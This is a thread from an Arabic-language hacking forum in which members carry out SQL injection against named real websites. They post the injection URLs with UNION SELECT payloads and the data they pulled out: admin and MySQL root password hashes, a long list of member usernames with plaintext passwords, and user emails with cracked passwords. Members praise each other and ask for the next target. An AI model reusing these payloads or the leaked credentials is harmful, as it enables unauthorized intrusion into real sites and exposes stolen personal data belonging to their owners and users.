|
أوكي تفضلوا : كود: http://www.itmaasia.com/news.php?id=1فقط بالنسبة للوحة حاولت الآن أبحث عنها بدون جدوى يعطي لوحة مزيفة :) بالتوفيق |
لول تم سحب باس الرووت شوف الموقع وحيد على الاستضافة http://www.bing.com/search?q=ip%3A12...=QBRE&filt=all و هذي الحقنة http://www.itmaasia.com/news.php?id=...rom+mysql.user localhost:citme_wanhu:*609F3B964379BF9A15167B8D55D A325DBC3A32E6 الباس مشفر تشفير Sha1 |
بالنسبة لباس اللوحة http://www.itmaasia.com/news.php?id=...uth.user_pwd-- xampp:wampp البيانات في وسط الصفحة في الخطا |
GooD و الله العظيم كنت أنتظر واحد يفيق للـ MYSQL لوول بالتوفيق |
اقتباس:
حبيبي الغالي بارك الله فيك على شغلك الحلو جاري التقييم واصل معانا ولا تحرمنا من مرورك تحياتي |
mercii |
اقتباس:
خذ راحتك اخي الغالي تحياتي |
اقتباس:
شغل روعة والله تسلم ايدك.. اسف هالمرة بدون تقييم خليها عالموقع الي بعدو ومن عيوني احلى تقييم لاحلى عضو بالشبكة تحياتي |
تم حقن الموقع http://www.itmaasia.com/ بنجاح والحمد لله نتائج الحقن تم استخراج يوزر وباس المدير تم استخراج يوزرات وكلمات سر الاعضاء تم استخراج يوزر وباس وهوست الروت وهذه هي الحقن: __________________________ حقنة استخراج الادمن: من الجدول tb_admin:password:exhibition وهذه هي العواميد: tb_admin:admin_id:exhibition tb_admin:username:exhibition tb_admin:password:exhibition tb_admin:flag:exhibition tb_admin:remark:exhibition tb_admin:is_del:exhibition الحقنة: http://www.itmaasia.com/news.php?id=...rom+tb_admin-- بيانات الادمن(لم استطع فك كلمة السر) wanhu 934f9012bc20d2aa4713f45afcb9a076 ___________________________ حقنة استخراج بيانات الأعضاء: من الجدول tb_member:mem_pass:exhibition وهذه هي العواميد: tb_member:id:exhibition tb_member:mem_name:exhibition tb_member:mem_pass:exhibition الحقنة:http://www.itmaasia.com/news.php?id=...om+tb_member-- بيانات الاعضاء (كلمات السر بدون تشفير): اسم المستخدم في اليسار واباس الى اليمين 13:W2D72:KINEXBRG7136 12:E1A52:59192665 11:w5c02:123456 10:W2D06:schwing2010 14:E4A70:H8733 15:E4A71:G8733 16:W5D12:itma99 17:W5A05:kugler 18:w3c71:law5c71 19:E3A05:richpeace 20:E2C63:731212 21:W4D01:Santex10 22:E4A10:bolondomb 23:E2D01:Terrot 24:E3D08:809642 25:E3D02:62226 26:W1A21:W1A21 27:W1a03:W1a03 28:w1a22:w1a22 29:w1a22:w1a22 30:w1a22:w1a22 31:w1a23:w1a23 32:w1a02:w1a02 33:E3D07:7437 34:E1C20:expoasia 35:E2D83:86171738 36:E2D22:E2D22 37:w4b01:86462690 38:e4d03:777777 39:$_SESSION[login_ok]:123456 40:wanhu:tongkong 41:W2A52:W2A52 42:w4d73:62576999 43:E1C65:165 44:E3A61:123 45:W2D52:bodah ________________________ حقنة استخراج الرووت: من الجدول: user:Password:mysql مع ادخال السيجما الى الحقنة وهذه هي العواميد: servers:Server_name:mysql servers:Host:mysql servers:Db:mysql servers:Username:mysql servers:Password:mysql servers:Port:mysql servers:Socket:mysql servers:Wrapper:mysql servers:Owner:mysql الحقنة:http://www.itmaasia.com/news.php?id=...m+mysql.user-- بيانات الروت: citme_wanhu *609F3B964379BF9A15167B8D55DA325DBC3A32E6 باقي ان نجد لوحة التحكم الصحيحة وندخل جربت الجدول servers:Password:mysql ولكنني وجدته فارغ الله يعطيكم الف عافية ياشباب للعلم انني لم اخذ شي من حقنة الاخ d4rK-h4ck3r وله وللجميع جزيل الشكر |
إجابة كاملة و موفقة هاته هي الحقنة المثالية بارك الله فيك أعجبكم الهدف ؟؟؟ لوول |
اقتباس:
اي والله اعجبني هالموقع (كتر منن)هههههه مشكور |
خرجت خارجا ل 3 ساعات ويبدو أنه فاتني الكثير من التشويق |
الحقنة الكاملة + id ههههههههههههههههههههه للتأكد فقط كود: http://www.marmoon.com/pregames.php?id=-383 UNION SELECT 1,2,3,group_concat(id,0x3a,admin,0x3a,pass),5,6,7,8,9,10,11,12,13+from+admin--كود: ps_customer:passwd:cartnanaكود: ************************id= 1 admin = admin pass=asdfgh وننتظر الهدف الجديد |
d4rK-h4ck3r أحي العزيز ما فائدة هذا الأمر كود: concat(0x3a3a3a3a3a,Host,0x3a,User,0x3a,Password,0x3a3a3a3a3a)+ أخي الكريم ما فائدة الأمر concat_ws و 0x3a في بداية الأمر بين المزدوجتين ولماذا كتب مرة واحدة كود: concat_ws(0x3a,id,user,parola) |
الله يعطيك العافية اخي ooooo_darkman_ooooo ☻ على الحقنة انا حاولت اخذ بيانات الأعضاء والايميلات وكانت النتيجة كالتالي: اولا: من الجدول pm_users:password:melody16 مع اضافة السيجما الى الاستغلال الأعمدة: pm_users:id:melody16 pm_users:username:melody16 pm_users:password:melody16 pm_users:name:melody16 pm_users:gender:melody16 pm_users:country:melody16 pm_users:reg_ip:melody16 pm_users:reg_date:melody16 pm_users:last_signin:melody16 pm_users:email:melody16 pm_users:favorite:melody16 pm_users:power:melody16 pm_users:about:melody16 pm_users:av الحقنة: http://www.marmoon.com/pregames.php?id=-38 union select 1,2,3,group_concat(id,0x3a,username,0x3a,password, 0x3a,email),5,6,7,8,9,10,11,12,13+from+melody16.pm _users-- وجدت عضوين في هذا الجدول (الغريب ان احدهما اسمه ادمن)!! البيانات الاول: admin 91477f9990ca6e6727c3961b0f1ed7ec your@email.com binary98 كلمة السر بعد فك التشفير الثاني: ( بات مان ) هههه batman99 d8578edf8458ce06fbc5bb76a58c5ca4 emark.s@gmail.com qwerty كلمة السر بعد فك التشفير جربت فوت على الايميل بس مو نفس كلة السر☺ ______________________ ثانبا: من الجدول:wp_users:user_pass:nananature من وضع السيجما في الرابط الأعمدة: wp_users:ID:nananature wp_users:user_login:nananature wp_users:user_pass:nananature wp_users:user_nicename:nananature wp_users:user_email:nananature wp_users:user_url:nananature wp_users:user_registered:nananature wp_users:user_activation_key:nananature wp_users:user_status:nananature wp_users:display_name:nananature wp_users:ID:wpdrama,wp الحقنة: http://www.marmoon.com/pregames.php?...ure.wp_users-- وجدت عضو واحد في الجدول وكمان اسمه ادمن!!! البيانات: admin $P$B8ky.p7DHHXJj3UvebuboIyKiJ9IyS. اطن sh1 admin@nana-nature.com اخيرا لوحة التحكم http://www.marmoon.com/admin بس ما قبلت بيانات الادمن (ياشباب والله بدنا حل لهذه المشكلة يعني صرت جايب ادمن كذا..... موقع بس ما يقبل يدخل لوحة الادارة بس الاعضاء بيدخلو معي للموقع وما بستفاد شي هههه) بدي اعرف يعني كم ادمن في الموقع صارو 3... :a02: والخير لقدام هههه الله يعطيك العافية اخي والاخوة جميعهم. smilies14 |
| الساعة الآن 08:35 AM |
[ vBspiders.Com Network ]